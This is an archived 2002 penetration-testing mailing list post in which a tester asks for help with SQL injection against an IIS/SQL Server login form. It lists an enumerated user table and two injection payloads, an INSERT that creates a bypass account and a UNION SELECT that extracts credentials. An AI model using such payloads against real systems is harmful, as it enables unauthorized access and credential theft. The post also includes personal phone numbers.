Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Penetration Testing: sql table data enumeration help please.

sql table data enumeration help please.

From: Gary O'leary-Steele <GaryO_at_sec-1.com>
Date: Thu, 9 May 2002 20:47:43 +0100

Hi all,

I am currently performing a pen test against a web server using IIS with SQL
integration. There is a user name and password form which I want to bypass
and enumerate existing usernames and passwords.

I have discovered the following columns/table data

tblusers.ID uniqueidentifier
tblusers.createdtimestamp smalldatetime
tblusers.sessionID nvarchar
tblUsers.LastUpdated smalldatetime
tblUsers.LastUpdatedIP nvarchar
tblUsers.LastUpdatedBy uniqueidentifier
tblUsers.CompanyType nvarchar
tblUsers.CompanyID uniqueidentifier
tblUsers.Password nvarchar
tblUsers.UserName nvarchar
tblUsers.Title nvarchar
tblUsers.Surname nvarchar
tblUsers.Forename nvarchar
tblUsers.AddressTo nvarchar
tblUsers.Appointment nvarchar
tblUsers.DirectPhone nvarchar
tblUsers.Mobile nvarchar
tblUsers.DirectEmail nvarchar
tblUsers.DirectFax nvarchar
tblUsers.Signature The text, ntext, and image data types are invalid in
this subquery or aggregate expression.
tblUsers.Address1 nvarchar
tblUsers.Address2 nvarchar
tblUsers.Address3 nvarchar
tblUsers.Address4 nvarchar
tblUsers.Address5 nvarchar
tblUsers.PostCode nvarchar
tblUsers.HomePhone nvarchar
tblUsers.UserAccess bit

I want to update the table to bypass the auth screen

I have tried

-------------
www.target.comUserName='insert into
tblusers(createdtimestamp,sessionID,LastUpdated,LastUpdatedIP,LastUpdatedBy,
CompanyType,CompanyID,Password,username,title,surname,forename,AddressTo,App
ointment,DirectPhone,Mobile,DirectEmail,directfax,signature,address1,address
2,postcode,Homephone,UserAccess) values ('Oct 31 2000 8:52PM','7654','Oct 31
2000
8:52PM','127.0.0.1','','securitycompany','','test','test','mr','oleary','gar
y','addrto','appointment','01131234567','07796698919','garyo_at_sec-1.com',0113
1234567','sig','123','456','ls287sr','01132297541',1)--

------------

But had no joy

In an attempt to gain access to data held with the username and password
fields I have tried

www.target.com/UserName='Union select 1,1,1,1,1,1,1,1,min(UserName) from
tblusers where username >'a'--&password=hacker

but get "Operand type clash: uniqueidentifier is incompatible with int"

Any help would be greatly appreciated

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
Received on May 09 2002

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]